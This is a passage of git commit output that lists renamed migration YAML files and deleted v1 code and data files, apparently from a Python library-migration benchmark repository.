data}/migration/openstackclient__osc-lib__openstack@deb-python-ironic-inspector-client__c25d73e.yaml (100%) rename {v2/data => data}/migration/openstackclient__osc-lib__openstack@deb-python-muranoclient__e3a2b68.yaml (100%) rename {v2/data => data}/migration/openstackclient__osc-lib__openstack@python-searchlightclient__0bc93d1.yaml (100%) rename {v2/data => data}/migration/paramiko__fabric__aws@aws-parallelcluster__d49460a.yaml (100%) rename {v2/data => data}/migration/pep8__pycodestyle__cyberbotics@urdf2webots__723168d.yaml (100%) rename {v2/data => data}/migration/pep8__pycodestyle__fabioz@PyDev.Debugger__d535c19.yaml (100%) rename {v2/data => data}/migration/pep8__pycodestyle__hhatto@autopep8__3e1c196.yaml (100%) rename {v2/data => data}/migration/pep8__pycodestyle__nchammas@flintrock__7323298.yaml (100%) rename {v2/data => data}/migration/pep8__pycodestyle__openstack@designate__2c9e9f5.yaml (100%) rename {v2/data => data}/migration/pep8__pycodestyle__openstack@sahara__61b0b2e.yaml (100%) rename {v2/data => data}/migration/pep8__pycodestyle__schlamar@flake8-todo__fcd59c6.yaml (100%) rename {v2/data => data}/migration/pil__pillow__rcos@observatory-retired__f970b54.yaml (100%) rename {v2/data => data}/migration/pil__pillow__shoebot@shoebot__0171fb9.yaml (100%) rename {v2/data => data}/migration/prettytable__tabulate__educationaltestingservice@skll__f870a65.yaml (100%) rename {v2/data => data}/migration/progressbar__tqdm__ozencb@yts-scraper__383401a.yaml (100%) rename {v2/data => data}/migration/progressbar__tqdm__redkyn@assigner__f132d03.yaml (100%) rename {v2/data => data}/migration/progressbar__tqdm__rivuletstudio@rivuletpy__52068ad.yaml (100%) rename {v2/data => data}/migration/progressbar__tqdm__wkentaro@fcn__399069a.yaml (100%) rename {v2/data => data}/migration/py-bcrypt__bcrypt__weasyl@weasyl__f6230c7.yaml (100%) rename {v2/data => data}/migration/pyandoc__pypandoc__hustlzp@permission__d174a21.yaml (100%) rename {v2/data => data}/migration/pycrypto__cryptography__freeopcua@opcua-asyncio__cdaff15.yaml (100%) rename {v2/data => data}/migration/pycrypto__pycryptodome__camptocamp@c2cgeoportal__14388c3.yaml (100%) rename {v2/data => data}/migration/pycrypto__pycryptodome__hhyo@archery__e192ca6.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__allencellmodeling@cookiecutter-pypackage__8d172cb.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__apache@libcloud__a68022d.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__cloudve@cloudbridge__27b217e.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__coresecurity@pysap__21fe13a.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__jvanovost@dc09_spt__08a9d0b.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__leifj@pyxmlsecurity__b5d88c8.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__mitya57@secretstorage__e637c3b.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__ojarva@python-sshpubkeys__e3ee2d2.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__openstack@glance__5ebde90.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__openstack@keystonemiddleware__e23cb36.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__privacyidea@privacyidea__bcd8a45.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__rev112@pyope__48c294a.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__secdev@scapy__c24298b.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__spockbotmc@spockbot__4442170.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__tgalal@python-axolotl__f74a936.yaml (100%) rename {v2/data => data}/migration/pycryptodome__cryptography__twisted@twisted__e31995c.yaml (100%) rename {v2/data => data}/migration/pycryptodome__pycryptodomex__azure@aztk__19dde42.yaml (100%) rename {v2/data => data}/migration/pycryptodome__pycryptodomex__malwaredllc@byob__9291b54.yaml (100%) rename {v2/data => data}/migration/pycryptodome__pycryptodomex__snemes@malware-analysis__02b064b.yaml (100%) rename {v2/data => data}/migration/pycurl__requests__tasmota@decode-config__5be6141.yaml (100%) rename {v2/data => data}/migration/pycurl__requests__upstox@upstox-python__dce8760.yaml (100%) rename {v2/data => data}/migration/pydotplus__pydot2__networkx@networkx__481f3e8.yaml (100%) rename {v2/data => data}/migration/pydotplus__pydot2__trungdong@prov__acb9b05.yaml (100%) rename {v2/data => data}/migration/pydotplus__pydot__mathics@mathics__915daeb.yaml (100%) rename {v2/data => data}/migration/pyfits__astropy__glue-viz@glue__5b2d7f9.yaml (100%) rename {v2/data => data}/migration/pyfits__astropy__icrar@ngas__fa8b714.yaml (100%) rename {v2/data => data}/migration/pyfits__astropy__spacetelescope@pysynphot__5b80ada.yaml (100%) rename {v2/data => data}/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__89c7afc.yaml (100%) rename {v2/data => data}/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__a7f4c3f.yaml (100%) rename {v2/data => data}/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__e5073e4.yaml (100%) rename {v2/data => data}/migration/pyopenssl__cryptography__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml (100%) rename {v2/data => data}/migration/pyopenssl__cryptography__celery@celery__9b39fc4.yaml (100%) rename {v2/data => data}/migration/pyopenssl__cryptography__openstack@neutron-lbaas__bb34d71.yaml (100%) rename {v2/data => data}/migration/pypcap__pcapy__openstack@steth__a981d2e.yaml (100%) rename {v2/data => data}/migration/pyqt5__pyside2__catalystneuro@nwb-conversion-tools__a2ef335.yaml (100%) rename {v2/data => data}/migration/pyqt5__pyside2__sanpen@gridcal__39a5dd9.yaml (100%) rename {v2/data => data}/migration/pyqt5__pyside6__toufool@auto-split__86244b6.yaml (100%) rename {v2/data => data}/migration/pyquery__beautifulsoup4__idan@telostats__f73354a.yaml (100%) rename {v2/data => data}/migration/pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml (100%) rename {v2/data => data}/migration/python-ldap__ldap3__cloud-custodian@cloud-custodian__cbaf252.yaml (100%) rename {v2/data => data}/migration/python-ldap__ldap3__ictu@quality-time__cc47b42.yaml (100%) rename {v2/data => data}/migration/python3-memcached__pymemcache__flan@staticdhcpd__0e64819.yaml (100%) rename {v2/data => data}/migration/pytorch-pretrained-bert__pytorch-transformers__haoxizhong@pytorch-worker__fa8de77.yaml (100%) rename {v2/data => data}/migration/pytorch-pretrained-bert__pytorch-transformers__kaushaltrivedi@fast-bert__1c96992.yaml (100%) rename {v2/data => data}/migration/pytorch-pretrained-bert__pytorch-transformers__naver@claf__cffe499.yaml (100%) rename {v2/data => data}/migration/pytorch-pretrained-bert__transformers__tiiiger@bert_score__04376e1.yaml (100%) rename {v2/data => data}/migration/pytorch-transformers__transformers__allenai@abductive-commonsense-reasoning__abfeffc.yaml (100%) rename {v2/data => data}/migration/pytorch-transformers__transformers__calclavia@story-generation__8954fad.yaml (100%) rename {v2/data => data}/migration/pytorch-transformers__transformers__huggingface@transfer-learning-conv-ai__16074b2.yaml (100%) rename {v2/data => data}/migration/pytorch-transformers__transformers__intellabs@nlp-architect__9f067f2.yaml (100%) rename {v2/data => data}/migration/pytorch-transformers__transformers__jsybrandt@agatha__b570ef0.yaml (100%) rename {v2/data => data}/migration/pytorch-transformers__transformers__nvidia@nemo__7866512.yaml (100%) rename {v2/data => data}/migration/pytz__pendulum__oddluck@limnoria-plugins__2c40713.yaml (100%) rename {v2/data => data}/migration/pytz__pendulum__oddluck@limnoria-plugins__33c7a3f.yaml (100%) rename {v2/data => data}/migration/pyuserinput__pynput__activitywatch@aw-watcher-afk__297b58c.yaml (100%) rename {v2/data => data}/migration/pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml (100%) rename {v2/data => data}/migration/pyyaml__oyaml__gammapy@gammapy__848da63.yaml (100%) rename {v2/data => data}/migration/pyyaml__ruamel.yaml__cloud-custodian@cloud-custodian__ee4d526.yaml (100%) rename {v2/data => data}/migration/pyyaml__ruamel.yaml__common-workflow-language@cwltool__b9b65c0.yaml (100%) rename {v2/data => data}/migration/pyyaml__ruamel.yaml__holgern@beem__f5ba90e.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__agdsn@sipa__ea23791.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__city-of-helsinki@respa__4fecb97.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__etalab@udata__9bc0f73.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__habitissimo@myaas__0a65bcc.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__kiwicom@the-zoo__e22070c.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__mozilla@addons-server__634c64f.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__onecodex@onecodex__120d961.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__pokainc@cfn-cross-region-export__f1120d3.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__teamsempo@sempoblockchain__449990a.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__thespaghettidetective@thespaghettidetective__b86b375.yaml (100%) rename {v2/data => data}/migration/raven__sentry-sdk__weasyl@weasyl__d10cb16.yaml (100%) rename {v2/data => data}/migration/redis__aioredis__walletconnect@py-walletconnect-bridge__c2d3db2.yaml (100%) rename {v2/data => data}/migration/requests-oauth2__oauthlib__mozilla@addons-server__5fd17b4.yaml (100%) rename {v2/data => data}/migration/requests-oauth2__requests-oauthlib__getsentry@sentry__0bfe540.yaml (100%) rename {v2/data => data}/migration/requests-oauth2__requests-oauthlib__gunthercox@chatterbot__6c3b234.yaml (100%) rename {v2/data => data}/migration/requests-oauth2__requests-oauthlib__sarumont@py-trello__ede0ceb.yaml (100%) rename {v2/data => data}/migration/requests-oauth2__requests__sybrenstuvel@flickrapi__c4f8d79.yaml (100%) rename {v2/data => data}/migration/requests__aiohttp__aiortc@aiortc__d30c240.yaml (100%) rename {v2/data => data}/migration/requests__aiohttp__ictu@quality-time__d3a9a16.yaml (100%) rename {v2/data => data}/migration/requests__aiohttp__keselekpermen69@userbutt__a2dd44e.yaml (100%) rename {v2/data => data}/migration/requests__aiohttp__paradoxalarminterface@pai__fac6f80.yaml (100%) rename {v2/data => data}/migration/requests__aiohttp__raptor123471@dingolingo__1d8923a.yaml (100%) rename {v2/data => data}/migration/requests__aiohttp__talkpython@async-techniques-python-course__a5c04bb.yaml (100%) rename {v2/data => data}/migration/requests__aiohttp__talkpython@async-techniques-python-course__ab4e5fd.yaml (100%) rename {v2/data => data}/migration/requests__aiohttp__usergeteam@userge-plugins__80a5434.yaml (100%) rename {v2/data => data}/migration/restkit__requests__sporteasy@python-poeditor__5710859.yaml (100%) rename {v2/data => data}/migration/retrying__tenacity__intelai@inference-model-manager__71aff3a.yaml (100%) rename {v2/data => data}/migration/retrying__tenacity__openstack@aodh__7587ab9.yaml (100%) rename {v2/data => data}/migration/retrying__tenacity__openstack@ceilometer__380bb26.yaml (100%) rename {v2/data => data}/migration/retrying__tenacity__openstack@ironic-inspector__f4648fa.yaml (100%) rename {v2/data => data}/migration/retrying__tenacity__openstack@ironic__b0607a2.yaml (100%) rename {v2/data => data}/migration/retrying__tenacity__pokainc@cfn-cross-region-export__8d0ec68.yaml (100%) rename {v2/data => data}/migration/rpi.gpio__gpiozero__raspberrypilearning@push-button-stop-motion__0b6cdad.yaml (100%) rename {v2/data => data}/migration/ruamel.yaml__pyyaml__cloud-custodian@cloud-custodian__12e3e80.yaml (100%) rename {v2/data => data}/migration/ruamel.yaml__pyyaml__microsoft@nni__b955ac9.yaml (100%) rename {v2/data => data}/migration/simplejson__ujson__covid-projections@covid-data-model__95385ff.yaml (100%) rename {v2/data => data}/migration/simplejson__ujson__zulip@zulip__222ef67.yaml (100%) rename {v2/data => data}/migration/slackclient__slack-sdk__alice-biometrics@petisco__9abf7b1.yaml (100%) rename {v2/data => data}/migration/slackclient__slack-sdk__slackapi@python-slack-events-api__813214e.yaml (100%) rename {v2/data => data}/migration/slackclient__slack-sdk__slackapi@python-slack-sdk__5f4d92a.yaml (100%) rename {v2/data => data}/migration/slackclient__slack-sdk__zulip@python-zulip-api__2d9cf64.yaml (100%) rename {v2/data => data}/migration/smbus-cffi__smbus2__pimoroni@inky__cba3651.yaml (100%) rename {v2/data => data}/migration/sphinx-rtd-theme__edx-sphinx-theme__edx@ecommerce__c1e120f.yaml (100%) rename {v2/data => data}/migration/sphinx-rtd-theme__guzzle-sphinx-theme__bashtage@arch__3620700.yaml (100%) rename {v2/data => data}/migration/suds-py3__zeep__whynothugo@django-afip__827dd9f.yaml (100%) rename {v2/data => data}/migration/suds__zeep__hbldh@pybankid__79e424c.yaml (100%) rename {v2/data => data}/migration/suds__zeep__openstate@open-raadsinformatie__b56e481.yaml (100%) rename {v2/data => data}/migration/tables__h5py__yoseflab@scvi__35163f0.yaml (100%) rename {v2/data => data}/migration/toml__tomlkit__greenbone@python-gvm__75a11ed.yaml (100%) rename {v2/data => data}/migration/toolz__cytoolz__nlesc@xtas__0dbf388.yaml (100%) rename {v2/data => data}/migration/trollius__asyncio__popupcad@popupcad__d0526f6.yaml (100%) rename {v2/data => data}/migration/twitter__tweepy__cloudbotirc@cloudbot__f824322.yaml (100%) rename {v2/data => data}/migration/twitter__tweepy__huntwelch@mongobot__bea008a.yaml (100%) rename {v2/data => data}/migration/ufolib__fonttools__googlefonts@cu2qu__3543e4f.yaml (100%) rename {v2/data => data}/migration/ujson__rapidjson__htrc@htrc-feature-reader__7eae68a.yaml (100%) rename {v2/data => data}/migration/ujson__rapidjson__kinto@kinto__951dd25.yaml (100%) rename {v2/data => data}/migration/ujson__rapidjson__murthylab@sleap__50721de.yaml (100%) rename {v2/data => data}/migration/umsgpack__msgpack__logicaldash@lise__028d0b3.yaml (100%) rename {v2/data => data}/migration/unicodecsv__csv__cfpb@cfgov-refresh__b4beec3.yaml (100%) rename {v2/data => data}/migration/unicodecsv__csv__seed-platform@seed__119ba4b.yaml (100%) rename {v2/data => data}/migration/unipath__pathlib__studentenportal@web__4842cff.yaml (100%) rename {v2/data => data}/migration/urllib3__requests__byrnereese@uphold-sdk-python__14fd085.yaml (100%) rename {v2/data => data}/migration/urllib3__requests__canonical@cloud-init__0fc887d.yaml (100%) rename {v2/data => data}/migration/urllib3__requests__finish06@pyunifi__3e53482.yaml (100%) rename {v2/data => data}/migration/urllib3__requests__mixpanel@mixpanel-python__e8a9330.yaml (100%) rename {v2/data => data}/migration/watchdog__pyinotify__onitu@onitu__04575c8.yaml (100%) rename {v2/data => data}/migration/webapp2__flask__c4rlo@vimhelp__7a5fadf.yaml (100%) rename {v2/data => data}/migration/werkzeug__webob__dahlia@sqlalchemy-imageattach__7cd3ca5.yaml (100%) rename {v2/data => data}/migration/wget__requests__noaa-oar-arl@monet__590936b.yaml (100%) rename {v2/data => data}/migration/xlsxwriter__openpyxl__bcgov@gwells__472f336.yaml (100%) delete mode 100644 v1/code/.gitignore delete mode 100644 v1/code/.idea/.gitignore delete mode 100644 v1/code/.idea/code.iml delete mode 100644 v1/code/.idea/inspectionProfiles/Project_Default.xml delete mode 100644 v1/code/.idea/inspectionProfiles/profiles_settings.xml delete mode 100644 v1/code/.idea/misc.xml delete mode 100644 v1/code/.idea/modules.xml delete mode 100644 v1/code/.idea/vcs.xml delete mode 100644 v1/code/core/Arguments.py delete mode 100644 v1/code/core/Constants.py delete mode 100644 v1/code/core/Factory.py delete mode 100644 v1/code/core/to_dict.py delete mode 100644 v1/code/db/Db.py delete mode 100644 v1/code/db/__init__.py delete mode 100644 v1/code/format/JSONFormat.py delete mode 100644 v1/code/format/OutputFormat.py delete mode 100644 v1/code/format/YAMLFormat.py delete mode 100644 v1/code/format/__init__.py delete mode 100644 v1/code/pymigbench.py delete mode 100644 v1/code/query/Count.py delete mode 100644 v1/code/query/Detail.py delete mode 100644 v1/code/query/Listing.py delete mode 100644 v1/code/query/Query.py delete mode 100644 v1/code/query/Result.py delete mode 100644 v1/code/query/Summary.py delete mode 100644 v1/code/requirements.txt delete mode 100644 v1/code/tests/__init__.py delete mode 100644 v1/code/tests/misc_test.py delete mode 100644 v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.diff delete mode 100644 v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.source.py delete mode 100644 v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.target.py delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.diff delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.source.py delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.target.py delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.diff delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.source.py delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.target.py delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.diff delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.source.py delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.target.py delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.diff delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.source.py delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.target.py delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.diff delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.source.py delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.target.py delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.diff delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.source.py delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.target.py delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.diff delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.source.py delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.target.py delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$client.py.diff delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$client.py.source.py delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$client.py.target.py delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.diff delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.source.py delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.target.py delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.diff delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.source.py delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.target.py delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.diff delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.source.py delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.target.py delete mode 100644 v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.diff delete mode 100644 v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.source.py delete mode 100644 v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.target.py delete mode 100644 v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.diff delete mode 100644 v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.source.py delete mode 100644 v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.target.py delete mode 100644 v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.diff delete mode 100644 v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.source.py delete mode 100644 v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.target.py delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.diff delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.source.py delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.target.py delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.diff delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.source.py delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.target.py delete mode 100644 v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.diff delete mode 100644 v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.source.py delete mode 100644 v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.target.py delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.diff delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.source.py delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.target.py delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.diff delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.source.py delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.target.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.diff delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.source.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.target.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.diff delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.source.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.target.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.diff delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.source.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.target.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.diff delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.source.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.target.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.diff delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.source.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.target.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.diff delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.source.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.target.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.diff delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.source.py delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.target.py delete mode 100644 v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.diff delete mode 100644 v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.source.py delete mode 100644 v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.target.py delete mode 100644 v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.diff delete mode 100644 v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.source.py delete mode 100644 v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.target.py delete mode 100644 v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.diff delete mode 100644 v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.source.py delete mode 100644 v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.target.py delete mode 100644 v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.diff delete mode 100644 v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.source.py delete mode 100644 v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.target.py delete mode 100644 v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.diff delete mode 100644 v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.source.py delete mode 100644 v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.target.py delete mode 100644 v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.diff delete mode 100644 v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.source.py delete mode 100644 v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.target.py delete mode 100644 v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.diff delete mode 100644 v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.source.py delete mode 100644 v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.target.py delete mode 100644 v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.diff delete mode 100644 v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.source.py delete mode 100644 v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.target.py delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.diff delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.source.py delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.target.py delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.diff delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.source.py delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.target.py delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.diff delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.source.py delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.target.py delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.diff delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.source.py delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.target.py delete mode 100644 v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.diff delete mode 100644 v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.source.py delete mode 100644 